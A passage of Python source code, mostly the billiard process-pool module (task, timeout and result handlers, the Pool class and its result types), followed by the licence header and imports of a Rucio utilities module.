return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2017
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2019
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@gmail.com>, 2019
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import requests
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types, PY3
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependancy (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
